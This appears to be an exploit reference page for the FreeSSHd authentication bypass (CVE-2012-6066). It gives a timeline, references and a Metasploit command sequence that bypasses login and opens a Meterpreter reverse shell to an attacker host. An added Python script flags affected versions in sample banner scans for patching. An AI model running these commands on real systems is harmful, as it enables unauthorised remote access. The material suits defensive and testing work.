Timeline :
Vulnerability initially discovered by Aris on 2010-08-11
PoC provided by kcope on 2012-12-01
Metasploit PoC provided on 2013-01-13
PoC provided by :
kcope
Aris
Daniele Martini
Reference(s) :
CVE-2012-6066
OSVDB-88006
BID-56785
Full Disclosure 2012
Full Disclosure 2010
Affected version(s) :
FreeSSHd version 1.2.6 and prior
Tested on Windows XP SP3 with :
FreeSSHd 1.2.4
Description :
This module exploits a vulnerability found in FreeSSHd 1.2.6 or earlier to bypass authentication. You only need a valid username (which defaults to root). The exploit has been tested against both password and public key authentication.
Commands :
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.178.22
run
use exploit/windows/ssh/freesshd_authbypass
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
getuid
sysinfo
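An added inventory check (not part of the original page or of the Metasploit module): given banner lines of the kind a version scan produces, it flags hosts whose FreeSSHd version falls in the affected range stated above, 1.2.6 and prior, comparing versions numerically so that 1.2.10 is correctly treated as newer than 1.2.6. The "host<TAB>banner" line format and the "FreeSSHd <version>" banner tag are assumptions, and the sample lines are constructed.

```python
import re

# Affected range stated on the page: FreeSSHd 1.2.6 and prior.
LAST_AFFECTED = (1, 2, 6)

# Constructed sample scan output (not real scanner output): one line per host,
# "host:port<TAB>banner". The "FreeSSHd <version>" tag is an assumption about
# how the service identifies itself in its SSH banner.
SAMPLE_SCAN = """\
192.0.2.10:22\tSSH-2.0-FreeSSHd 1.2.4
192.0.2.11:22\tSSH-2.0-FreeSSHd 1.2.6
192.0.2.12:22\tSSH-2.0-FreeSSHd 1.2.10
192.0.2.13:22\tSSH-2.0-OpenSSH_6.1
192.0.2.14:2222\tSSH-2.0-FreeSSHd 1.3
"""

BANNER_RE = re.compile(r"FreeSSHd\s+(\d+(?:\.\d+)*)", re.IGNORECASE)


def parse_version(text):
    """'1.2.10' -> (1, 2, 10); numeric tuples compare correctly, unlike strings."""
    return tuple(int(part) for part in text.split("."))


def pad(version, length):
    """Right-pad a version tuple with zeros so '1.3' compares as (1, 3, 0)."""
    return version + (0,) * (length - len(version))


def is_affected(version, last_affected=LAST_AFFECTED):
    """True when version <= last affected release (1.2.6 and prior)."""
    width = max(len(version), len(last_affected))
    return pad(version, width) <= pad(last_affected, width)


def flag_hosts(scan_text):
    """Return (host, version) for every FreeSSHd banner in the affected range."""
    hits = []
    for line in scan_text.splitlines():
        if not line.strip():
            continue
        host, _, banner = line.partition("\t")
        match = BANNER_RE.search(banner)
        if not match:
            continue  # not FreeSSHd (e.g. OpenSSH): out of scope for this check
        version = match.group(1)
        if is_affected(parse_version(version)):
            hits.append((host, version))
    return hits


if __name__ == "__main__":
    for host, version in flag_hosts(SAMPLE_SCAN):
        print(f"{host}\tFreeSSHd {version}\taffected (1.2.6 or prior): patch or isolate")
```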